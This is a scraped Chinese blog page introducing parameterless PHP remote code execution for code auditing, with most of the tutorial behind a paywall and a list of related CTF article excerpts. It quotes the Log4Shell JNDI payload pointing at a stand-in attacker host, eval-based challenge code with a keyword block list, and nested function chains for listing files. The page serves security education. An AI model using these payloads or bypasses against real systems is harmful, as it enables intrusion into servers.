【网络安全 | 代码审计】PHP无参数RCE

最新推荐文章于 2025-03-26 18:01:15 发布
最新推荐文章于 2025-03-26 18:01:15 发布
阅读量2.7k 收藏 2
点赞数 11
CC 4.0 BY-SA版权
分类专栏: 网络安全新手快速入门(附漏洞挖掘案例) 文章标签: web安全 代码审计 PHP
原创文章,禁止转载,否则保留追究法律责任的权利。
本文链接:https://blog.youkuaiyun.com/2301_77485708/article/details/142311330

未经许可,不得转载。

文章目录

无参数RCE

一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数。

例如,log4j2 漏洞(CVE-2021-44228)就是一个经典的无参数RCE示例:

在这里插入图片描述

https://blog.cloudflare.com/zh-cn/inside-the-log4j2-vulnerability-cve-2021-44228/

当请求头中的 User-Agent 被修改为如下内容时:

User-Agent: ${jndi:ldap://attacker-server.com/exploit}

日志框架会自动解析该用户代理头并执行外部服务器上的恶意代码,这个过程无需应用程序提供特定的参数。

代码审计

存在三个代码段,它们对code参数的过滤如下:

了解本专栏 订阅专栏 解锁全文 超级会员免费看
网络安全 | Java代码审计】JreCms代码审计
等风来
09-15 2395
Jrecms 是一款基于 Java 开发的开源内容管理系统(CMS),用于快速搭建网站、博客、企业门户等。
网络安全 | PHP代码审计】YXcms
等风来
09-19 2835
由于所有后台页面都继承了这个类,因此所有后台页面都会执行这个构造函数,导致全站沦陷。管理员未登录的情况下,访问钓鱼链接,也能实现后续的账户接管。
无参数函数RCE
weixin_53146913的博客
07-19 2377
1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取
PHP无参数RCE
weixin_43610673的博客
03-14 3177
无参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
无参数rce
qi_SJQ_的博客
08-10 351
getcwd():返回当前目录的绝对路径------返回路径 scandir() :列出指定路径中的文件和目录,返回的是数组!-----利用路径(目录) print_r() :以易于理解的格式打印变量-----输出 怎么构造? localeconv() :返回一包含本地数字及货币格式信息的数组,而数组第一项就是".",因此要再用一个函数取出这个点。可以current(localeconv())返回“.”。 故:var_dump(scandir(current(localeconv())));----遍历当
CTFweb无参数RCE
遇事不决冲冲冲
07-25 3192
1 打开题目便是源代码,通过a的参数来实现RCE <?php #-*-coding: utf-8 -*- //flag in show_flag.php if(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); } }else{ hig
php无参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 2151
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
php无参执行RCE
遇事不决冲冲冲
03-23 3358
php无参执行RCE一般来说当我们可以控制或自己上传一个木马后,就可以进行任意命令执行,但像上面这样`/[^\W]+\((?R)?\)/`的正则过滤方式,我们不能输入任何参数,这样想绕过的话一个大的思路就是通过套娃,通过让一个函数的返回值作为另一个函数的参数,也就是这样`a(b(c()));`,最终达到rce的效果,下面列几种绕过方法
第52天:代码审计-PHP项目类RCE及文件包含下载删除1
08-03
网络安全领域,代码审计是确保应用程序安全性的重要环节。本文主要探讨了PHP项目中常见的安全漏洞类型,包括远程代码执行(RCE)、文件包含、下载、删除等,并提供了相关的漏洞利用关键字和实例分析。 首先,SQL...
代码审计-RCE
z1900552728的博客
11-28 875
常见语言远程代码执行
php 让函数的参数可有可无(可以不传递参数)
01-08
前言 正常情况下,函数一旦声明参数,调用时就必须传入,否则会报错: function demo($e){ return $e; } echo demo(); // Uncaught ArgumentCountError: Too few arguments to function xxxx() 那么如何实现 想传参就传,不想传就不传呢? 实现 很简单,只需要 将形参指定默认值为空即可,下面给出一个演示: function demo($e = ''){ return $e; } echo demo();// echo demo('hello, world!');//hello,
php无参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 709
前言最近做了一些 php 无参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
无参数RCE知识点
m0_75178803的博客
12-12 1210
无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果。
无参RCE
qq_74240553的博客
01-25 655
CTF,无参数
php读参数文件下载,php rce无参数读文件
weixin_30332669的博客
03-09 345
一、什么是无参数?就是使用函数的时候不能带有参数。可以是a()、a(b())或a(b(c())),但不能是a('b')或a('b','c'),不能带参数所以我们要使用无参数的函数进行文件读取或者命令执行。二、无参数文件读取查看当前目录文件名通常,可以使用print_r(scandir('.'))查看当前目录下所有文件,以数组的形式输出。但是要怎么构造参数里这个点呢。current() 返回数组中的...
无参数读文件和RCE
最新发布
智商不在服务区的博客
03-26 1352
无参数(No-Argument)的概念,顾名思义,就是在PHP中调用函数时,不传递任何参数。我们需要利用仅靠函数本身的返回值或嵌套无参数函数的方式,达到读取文件或远程命令执行(RCE)的目的。这类攻击通常受限于特定的代码环境,例如:只能使用不带参数的函数。传递参数时,必须是另一个函数的返回值。受限于PHP的内置安全机制,如和。
[GXYCTF2019]禁止套娃(无参数函数RCE
EC_Carrot的博客
11-04 559
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考链接: https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#什么是无参数函数RCE https://www.cnblogs.com/wangtanzhi/p/12260986.html 什么是无参数函数RCE 传统意义上,如果我们有eval($_GET['code']); 即代表我们可
无参数绕过RCE
m0_73756016的博客
04-07 1536
顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等无参数题目特征if(';R)?代码解析这里使用替换匹配到的字符为空,\w匹配字母、数字和下划线,等价于,然后R)?这个意思为递归整个匹配模式eg:[^\W]+\(?\)匹配到"a()"形式的字符串,但是()不能内出现任何参数(?R)代表递归,即a(b(c()))都能匹配到使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;
初探rce中的无参数rce
2302_79359652的博客
03-09 1281
源码中过滤了常用伪协议,用正则表达式规定只可以使用无参数函数进行RCE
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值